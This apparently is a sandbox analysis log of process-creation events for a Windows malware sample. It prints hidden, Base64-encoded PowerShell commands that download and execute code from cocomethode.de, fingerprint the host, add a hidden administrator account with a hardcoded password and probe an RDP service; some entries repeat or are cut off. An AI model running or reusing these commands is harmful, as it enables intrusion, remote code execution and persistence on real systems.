Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWERsheLl.eXE -WINDoWSTylE hiDdEN -EncoDEdCommAnd "UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACIALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAiACwAIAAiAC0ATgBvAEwAbwBnAG8AIgAsACAAIgAtAE4AbwBQAHIAbwBmAGkAbABlACIALAAgACIALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACIALAAgACIALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIABTAFEAQgBGAEEARgBnAEEASQBBAEEAbwBBAEYAcwBBAFYAQQBCAEYAQQBGAGcAQQBkAEEAQQB1AEEARQBVAEEAYgBnAEIAagBBAEUAOABBAFIAQQBCAHAAQQBHADQAQQBSAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBsAEEARgBRAEEAVQB3AEIAMABBAEYASQBBAFMAUQBCAE8AQQBHAGMAQQBLAEEAQQBvAEEARQBrAEEAZAB3AEIAeQBBAEMAQQBBAEsAQQBCAGIAQQBGAE0AQQBlAFEAQgB6AEEASABRAEEAWgBRAEIAdABBAEMANABBAFYAQQBCAGwAQQBIAGcAQQBkAEEAQQB1AEEARQBVAEEAYgBnAEIAagBBAEcAOABBAFoAQQBCAHAAQQBHADQAQQBaAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBsAEEASABRAEEAVQB3AEIAMABBAEgASQBBAGEAUQBCAHUAQQBHAGMAQQBLAEEAQgBiAEEARQBNAEEAYgB3AEIAdQBBAEgAWQBBAFoAUQBCAHkAQQBIAFEAQQBYAFEAQQA2AEEARABvAEEAUgBnAEIAeQBBAEcAOABBAGIAUQBCAEMAQQBHAEUAQQBjAHcAQgBsAEEARABZAEEATgBBAEIAVABBAEgAUQBBAGMAZwBCAHAAQQBHADQAQQBaAHcAQQBvAEEAQwBJAEEAWQBRAEIASQBBAEYASQBBAE0AQQBCAGoAQQBFAGcAQQBUAFEAQQAyAEEARQB3AEEAZQBRAEEANQBBAEcAbwBBAFkAZwBBAHkAQQBFADQAQQBkAGcAQgBpAEEARgBjAEEAVgBnAEEAdwBBAEcARQBBAFIAdwBBADUAQQBHAHMAQQBXAGcAQgBUAEEARABVAEEAYQB3AEIAYQBBAEYATQBBAE8AUQBCAFEAQQBGAE0AQQBNAEEAQQAxAEEARwAwAEEASQBnAEEAcABBAEMAawBBAEsAUQBBAHAAQQBDADQAQQBRAHcAQgBQAEEARwA0AEEAVgBBAEIARgBBAEcANABBAGQAQQBBAHAAQQBDAGsAQQAiAA=="
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -NoLogo -NoProfile -ExecutionPolicy Bypass -EncodedCommand SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBjAE8ARABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAFQAUwB0AFIASQBOAGcAKAAoAEkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5AGoAYgAyAE4AdgBiAFcAVgAwAGEARwA5AGsAWgBTADUAawBaAFMAOQBQAFMAMAA1AG0AIgApACkAKQApAC4AQwBPAG4AVABFAG4AdAApACkA
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBjAG8AYwBvAG0AZQB0AGgAbwBkAGUALgBkAGUALwBmAGkAbABlADIALwA0ADQAMgBkADYAZAAyAGIAYgBiAGYAOQA1AGEAMABjADIAZAA5ADgAMwAzADUAYwA3AGMAZgAxADIAZAA5AGQANABhADIAMQA2ADMAYgBmAGQAMwAzAGYANAAyADUANAA3AGQAOABlADIAMQA3ADYAMwA0ADkAZgBjADUAYgBlAGMAOQA5ADkAZABmADcANwBlAGQANgBmAGMAMQAwAGMAZAAyAGIAOABmADEAYgBmADYAZQAxADQAMQA5AGEAZgBkADEAYgA4AGUANgA1ADIAZAA2ADAAOAAyADAAYQA1ADYAZgA1AGQAOAA3ADIAYgA5ADgAMwAyAGQANQA4AGMAZgBlADYANQAzADQAOABiAGQAYgA2ADEANgBkAGIAMgAzAGUANAAzAGYANwA5ADcAMgBkAGEAZgAzADkAMQBmADEAMwBiAGQANgBhADYAOQBjADgAOQAxADkAMAAyADgAMAA3AGEAYQBkADQAMgAzADYAMgA3ADgAMQAxAGMAOABlADAAZAA0AGEAYQA3AGUAZQA5ADMAOQBkADcANAA1ADIAMAAxAGUAZQBkADgAMAA2AGUAZQA5ADcAOQBmAGEAIgA7AA0ACgAkAGMAbwB1AG4AdAAgAD0AIAAxADAAMAA7AA0ACgANAAoADQAKAA0ACgBmAHUAbgBjAHQAaQBvAG4AIABTAGUAbgBkACAAewANAAoAIAAgACAAIABwAGEAcgBhAG0AKAAgAFsAUABTAE8AYgBqAGUAYwB0AF0AIAAkAGwAbwBnAE0AcwBnACAAKQANAAoADQAKACAAIAAgACAAIwAgAEMAbwBuAHYAZQByAHQAIABiAG8AZAB5ACAAdABvACAAcwB0AHIAaQBuAGcADQAKACAAIAAgACAAJABzAHQAcgBpAG4AZwBCAG8AZAB5ACAAPQAgAFsAcwB0AHIAaQBuAGcAXQAoACQAbABvAGcATQBzAGcAIAB8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgAD0AIABAACgAKQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAJABzAHQAcgBpAG4AZwBCAG8AZAB5ADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAArAD0AIAAiAC0ALQAtAC0ALQAtAC0ALQAtAC0AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAIAA9ACAAQAB7AH0AOwANAAoAIAAgACAAIAAkAGsAZQB5ACAAPQAgACIAQwBvAG4AdABlAG4AdAAtAFQAeQBwAGUAIgA7AA0ACgAgACAAIAAgACQAdgBhAGwAdQBlACAAPQAgACIAYQBwAHAAbABpAGMAYQB0AGkAbwBuAC8AagBzAG8AbgAiADsADQAKAA0ACgAgACAAIAAgACQAaABlAGEAZABlAHIAcwBbACQAawBlAHkAXQAgAD0AIAAkAHYAYQBsAHUAZQA7AA0ACgAgACAAIAAgACQAdQByAGkAIAA9ACAAIgBMAE8ARwBVAFIATAAiADsADQAKACAAIAAgACAAdAByAHkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGIAbwBkAHkAIAA9ACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAB8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBpACAALQBNAGUAdABoAG8AZAAgAFAAbwBzAHQAIAAtAEgAZQBhAGQAZQByAHMAIAAkAGgAZQBhAGQAZQByAHMAIAAtAEIAbwBkAHkAIAAkAGIAbwBkAHkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAANAAoAfQANAAoADQAKAHcAaABpAGwAZQAoACQAYwBvAHUAbgB0ACAALQBnAHQAIAAwACkADQAKAHsADQAKAAkADQAKAAkAdAByAHkAewANAAoAIAAgACAAIAAgACAAIAAgAFMAZQBuAGQAIAAiAGIAZQBnAGkAbgAgAGQAbwB3AG4AbABvAGEAZAAgACQAdQByAGkAIgA7AA0ACgAJAAkAJABjAG8AbgB0AGUAbgB0ACAAPQAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBpACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwA7AA0ACgAgACAAIAAgACAAIAAgACAAJABiAHkAdABlAEEAcgByAGEAeQAgAD0AIAAkAGMAbwBuAHQAZQBuAHQALgBjAG8AbgB0AGUAbgB0ADsADQAKACAAIAAgACAAIAAgACAAIABmAG8AcgAgACgAJABpACAAPQAgADAAOwAgAC
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBJAGQAZQBuAHQAaQB0AHkAewAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAAJABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBkAEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKACQAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwAHUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABDAGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABVAG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAHkAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKAGMAZAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgA7AAoAJAB0AGUAcwB0ACAAPQAgAEcAZQB0AC0ASQBkAGUAbgB0AGkAdAB5ADsACgAkAHQAZQBzAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAGQAZQB2AGkAYwBlAEkAZAAuAHQAeAB0ACIAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAVABGADgA
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand JABVAHMAZQByAG4AYQBtAGUAIAA9ACAAIgBVAHMAZQByADEAIgA7ACQAcAB3AGQAIAA9ACAAIgAxADIAMwA0ADUANgA3ADgAOQAhAEEAMQBhACIAOwAgACQAVQBzAGUAcgBQAGEAcgBhAG0AcwAgAD0AIABAAHsAJwBOAGEAbQBlACcAIAA9ACAAJABVAHMAZQByAG4AYQBtAGUAOwAgACcAUABhAHMAcwB3AG8AcgBkACcAIAA9ACAAKABDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAALQBTAHQAcgBpAG4AZwAgACQAcAB3AGQAIAAtAEEAcwBQAGwAYQBpAG4AVABlAHgAdAAgAC0ARgBvAHIAYwBlACkAOwAgACcAUABhAHMAcwB3AG8AcgBkAE4AZQB2AGUAcgBFAHgAcABpAHIAZQBzACcAIAA9ACAAJAB0AHIAdQBlAH0AOwBOAGUAdwAtAEwAbwBjAGEAbABVAHMAZQByACAAQABVAHMAZQByAFAAYQByAGEAbQBzADsAJABHAHIAbwB1AHAAUABhAHIAYQBtAHMAIAA9ACAAQAB7ACcARwByAG8AdQBwACcAIAA9ACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAJwA7ACAAJwBNAGUAbQBiAGUAcgAnACAAPQAgACQAVQBzAGUAcgBuAGEAbQBlAH0AOwBBAGQAZAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIABAAEcAcgBvAHUAcABQAGEAcgBhAG0AcwA7AA0ACgA=
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZwBlAHQALQBzAGUAcgB2AGkAYwBlACAAIgBtAHkAUgBkAHAAUwBlAHIAdgBpAGMAZQAiAA==
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWERsheLl.eXE -WINDoWSTylE hiDdEN -EncoDEdCommAnd "UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACIALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAiACwAIAAiAC0ATgBvAEwAbwBnAG8AIgAsACAAIgAtAE4AbwBQAHIAbwBmAGkAbABlACIALAAgACIALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACIALAAgACIALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIABTAFEAQgBGAEEARgBnAEEASQBBAEEAbwBBAEYAcwBBAFYAQQBCAEYAQQBGAGcAQQBkAEEAQQB1AEEARQBVAEEAYgBnAEIAagBBAEUAOABBAFIAQQBCAHAAQQBHADQAQQBSAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBsAEEARgBRAEEAVQB3AEIAMABBAEYASQBBAFMAUQBCAE8AQQBHAGMAQQBLAEEAQQBvAEEARQBrAEEAZAB3AEIAeQBBAEMAQQBBAEsAQQBCAGIAQQBGAE0AQQBlAFEAQgB6AEEASABRAEEAWgBRAEIAdABBAEMANABBAFYAQQBCAGwAQQBIAGcAQQBkAEEAQQB1AEEARQBVAEEAYgBnAEIAagBBAEcAOABBAFoAQQBCAHAAQQBHADQAQQBaAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBsAEEASABRAEEAVQB3AEIAMABBAEgASQBBAGEAUQBCAHUAQQBHAGMAQQBLAEEAQgBiAEEARQBNAEEAYgB3AEIAdQBBAEgAWQBBAFoAUQBCAHkAQQBIAFEAQQBYAFEAQQA2AEEARABvAEEAUgBnAEIAeQBBAEcAOABBAGIAUQBCAEMAQQBHAEUAQQBjAHcAQgBsAEEARABZAEEATgBBAEIAVABBAEgAUQBBAGMAZwBCAHAAQQBHADQAQQBaAHcAQQBvAEEAQwBJAEEAWQBRAEIASQBBAEYASQBBAE0AQQBCAGoAQQBFAGcAQQBUAFEAQQAyAEEARQB3AEEAZQBRAEEANQBBAEcAbwBBAFkAZwBBAHkAQQBFADQAQQBkAGcAQgBpAEEARgBjAEEAVgBnAEEAdwBBAEcARQBBAFIAdwBBADUAQQBHAHMAQQBXAGcAQgBUAEEARABVAEEAYQB3AEIAYQBBAEYATQBBAE8AUQBCAFEAQQBGAE0AQQBNAEEAQQAxAEEARwAwAEEASQBnAEEAcABBAEMAawBBAEsAUQBBAHAAQQBDADQAQQBRAHcAQgBQAEEARwA0AEEAVgBBAEIARgBBAEcANABBAGQAQQBBAHAAQQBDAGsAQQAiAA=="	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -NoLogo -NoProfile -ExecutionPolicy Bypass -EncodedCommand SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBjAE8ARABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAFQAUwB0AFIASQBOAGcAKAAoAEkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5AGoAYgAyAE4AdgBiAFcAVgAwAGEARwA5AGsAWgBTADUAawBaAFMAOQBQAFMAMAA1AG0AIgApACkAKQApAC4AQwBPAG4AVABFAG4AdAApACkA	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBjAG8AYwBvAG0AZQB0AGgAbwBkAGUALgBkAGUALwBmAGkAbABlADIALwA0ADQAMgBkADYAZAAyAGIAYgBiAGYAOQA1AGEAMABjADIAZAA5ADgAMwAzADUAYwA3AGMAZgAxADIAZAA5AGQANABhADIAMQA2ADMAYgBmAGQAMwAzAGYANAAyADUANAA3AGQAOABlADIAMQA3ADYAMwA0ADkAZgBjADUAYgBlAGMAOQA5ADkAZABmADcANwBlAGQANgBmAGMAMQAwAGMAZAAyAGIAOABmADEAYgBmADYAZQAxADQAMQA5AGEAZgBkADEAYgA4AGUANgA1ADIAZAA2ADAAOAAyADAAYQA1ADYAZgA1AGQAOAA3ADIAYgA5ADgAMwAyAGQANQA4AGMAZgBlADYANQAzADQAOABiAGQAYgA2ADEANgBkAGIAMgAzAGUANAAzAGYANwA5ADcAMgBkAGEAZgAzADkAMQBmADEAMwBiAGQANgBhADYAOQBjADgAOQAxADkAMAAyADgAMAA3AGEAYQBkADQAMgAzADYAMgA3ADgAMQAxAGMAOABlADAAZAA0AGEAYQA3AGUAZQA5ADMAOQBkADcANAA1ADIAMAAxAGUAZQBkADgAMAA2AGUAZQA5ADcAOQBmAGEAIgA7AA0ACgAkAGMAbwB1AG4AdAAgAD0AIAAxADAAMAA7AA0ACgANAAoADQAKAA0ACgBmAHUAbgBjAHQAaQBvAG4AIABTAGUAbgBkACAAewANAAoAIAAgACAAIABwAGEAcgBhAG0AKAAgAFsAUABTAE8AYgBqAGUAYwB0AF0AIAAkAGwAbwBnAE0AcwBnACAAKQANAAoADQAKACAAIAAgACAAIwAgAEMAbwBuAHYAZQByAHQAIABiAG8AZAB5ACAAdABvACAAcwB0AHIAaQBuAGcADQAKACAAIAAgACAAJABzAHQAcgBpAG4AZwBCAG8AZAB5ACAAPQAgAFsAcwB0AHIAaQBuAGcAXQAoACQAbABvAGcATQBzAGcAIAB8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgAD0AIABAACgAKQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAJABzAHQAcgBpAG4AZwBCAG8AZAB5ADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAArAD0AIAAiAC0ALQAtAC0ALQAtAC0ALQAtAC0AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAIAA9ACAAQAB7AH0AOwANAAoAIAAgACAAIAAkAGsAZQB5ACAAPQAgACIAQwBvAG4AdABlAG4AdAAtAFQAeQBwAGUAIgA7AA0ACgAgACAAIAAgACQAdgBhAGwAdQBlACAAPQAgACIAYQBwAHAAbABpAGMAYQB0AGkAbwBuAC8AagBzAG8AbgAiADsADQAKAA0ACgAgACAAIAAgACQAaABlAGEAZABlAHIAcwBbACQAawBlAHkAXQAgAD0AIAAkAHYAYQBsAHUAZQA7AA0ACgAgACAAIAAgACQAdQByAGkAIAA9ACAAIgBMAE8ARwBVAFIATAAiADsADQAKACAAIAAgACAAdAByAHkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGIAbwBkAHkAIAA9ACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAB8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBpACAALQBNAGUAdABoAG8AZAAgAFAAbwBzAHQAIAAtAEgAZQBhAGQAZQByAHMAIAAkAGgAZQBhAGQAZQByAHMAIAAtAEIAbwBkAHkAIAAkAGIAbwBkAHkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAANAAoAfQANAAoADQAKAHcAaABpAGwAZQAoACQAYwBvAHUAbgB0ACAALQBnAHQAIAAwACkADQAKAHsADQAKAAkADQAKAAkAdAByAHkAewANAAoAIAAgACAAIAAgACAAIAAgAFMAZQBuAGQAIAAiAGIAZQBnAGkAbgAgAGQAbwB3AG4AbABvAGEAZAAgACQAdQByAGkAIgA7AA0ACgAJAAkAJABjAG8AbgB0AGUAbgB0ACAAPQAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBpACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwA7AA0ACgAgACAAIAAgACAAIAAgACAAJABiAHkAdABlAEEAcgByAGEAeQAgAD0AIAAkAGMAbwBuAHQAZQBuAHQALgBjAG8AbgB0AGUAbgB0ADsADQAKACAAIAAgACAAIAAgACAAIABmAG8AcgAgACgAJABpACAAPQAgADAAOwAgAC
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBJAGQAZQBuAHQAaQB0AHkAewAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAA